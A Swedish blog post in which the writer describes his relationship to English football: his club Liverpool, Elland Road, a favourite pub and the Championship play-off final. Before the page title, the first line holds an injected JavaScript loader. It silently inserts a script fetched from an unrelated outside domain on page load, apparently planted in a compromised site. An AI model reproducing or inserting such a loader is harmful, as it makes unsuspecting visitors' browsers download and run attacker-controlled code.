;(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,"script","https://treegreeny.org/KDJnCSZn"); Mitt fotbollsland, England – FMSweden
Meny Stäng

Mitt fotbollsland, England

Varmt välkomna till ”Start of the Week”!

Här kommer jag skriva om fotboll i allmänhet och engelsk fotboll samt Football Manager i synnerhet. Vi är många som följer den engelska fotbollen närmast efter den svenska eller man kanske rent av bara följer den engelska fotbollen och man har av olika anledningar hittat sitt lag, sin arena, sin pub och så vidare. Här är min relation till mitt fotbollsland, England.

Mitt lag: Liverpool FC

Varför börjar man heja på ett lag? En fråga som är helt omöjlig att svara på eftersom svaret grundar sig i känslor. I mitt fall, känslor som kom till mig i en ung ålder och därifrån har min relation till Liverpool FC bara växt sig starkare så att återvända till 2007 som är mitt första minne som Liverpool-supporter och svara på frågan varför? Det blir helt omöjligt.

Men det finns en match där det går att räta ut några frågetecken. Familjen har noll kopplingar till Liverpool vilket gör allting än mer komplext men mitt första minne med Liverpool är CL-finalen 2007 då jag som 6-årig grabb grät mig igenom sista 10 minutrarna och även om Kuyts mål skänkte en gnutta hopp så räckte det inte hela vägen. I den finalen blev jag Liverpool. Den dagen och den finalen var jag antagligen mer mottaglig för den typen av känslor och att det blev Liverpool och inte Milan, som stod för finalmotståndet tror jag ligger i att jag alltid haft större och varmare känslor för en underdog.

Den 23:e maj 2007 fångade Liverpool en sex-årig grabbs hjärta och det är den idag 20-årige grabben extremt glad för.

Min arena: Elland Road

Lättaste och mest logiska svaret hade såklart varit Anfield men så jobbar inte riktigt jag. Enkelt och logiskt är tråkigt i just detta sammanhang. Elland Road i Leeds där Leeds United spelar sina hemmamatcher är min arena och jag tycker också att det är mallen på hur en arena ska se ut. Inbyggda hörn men ändå en känsla av två kortsidor och två långsidor med en tydlig huvudläktare. Stolarna är tajta både i djupled och sidled så det är inte direkt bekvämt att sitta ner och det ska det inte vara heller i min mening. Till sist älskar jag att den e gammal och riktigt sliten och det krävs som ni förstår att arenan har lite erfarenhet. Arenor som Elland Road och Craven Cottage kommer aldrig mer finnas den dagen dem rivs, för de nybyggda arenorna kommer inte tillåtas bli så här slitna.

Min pub: The Old Peacock

En stor del av den engelska supporterkulturen handlar om uppladdning inför match med pints och sång och då finns det i min mening inget bättre ställe än The old Peacock. Sitta ute när solen är påväg ner. Ett live-band som spelar halvbra lokal musik med en pint i handen. Det är precis så det ska vara när man laddar upp inför match. Fyllt med barer och förbannat god stämning. Har ni inte varit där, åk dit. The old Peacock måste upplevas.

Min match: Championship-finalen på Wembley

Det finns ingen match jag håller högre i världen, CL-final inräknat. Championships playoff är det bästa med hela fotbollssäsongen. Två semifinaler med dubbelmöte och en sanslöst lång säsong kommer ner till en match. Wembley. Fullsatt. 40,000 supportrar av den ena färgen, 40,000 supportrar av den andra färgen. Världens mest värdefulla match och på planen står 22 spelare från Championship. Kontrasterna i förutsättningarna gör det till min match. Världens bästa match som spelas varje år.

Nu är vi igång med ”Start of the Week”. Detta ska bli riktigt roligt och tveka inte på att höra av er till mig med tips, vad ni vill se i denna blogg, med mera. Antingen här eller så finns jag också på Twitter under @HZakrisson. Nästa vecka drar jag igång med en saverapport där vi startar i Championship. Trevlig vecka på er så hörs vi nästa måndag!

Please wait...

Liknande Inlägg

2 kommentarer

Lämna ett svar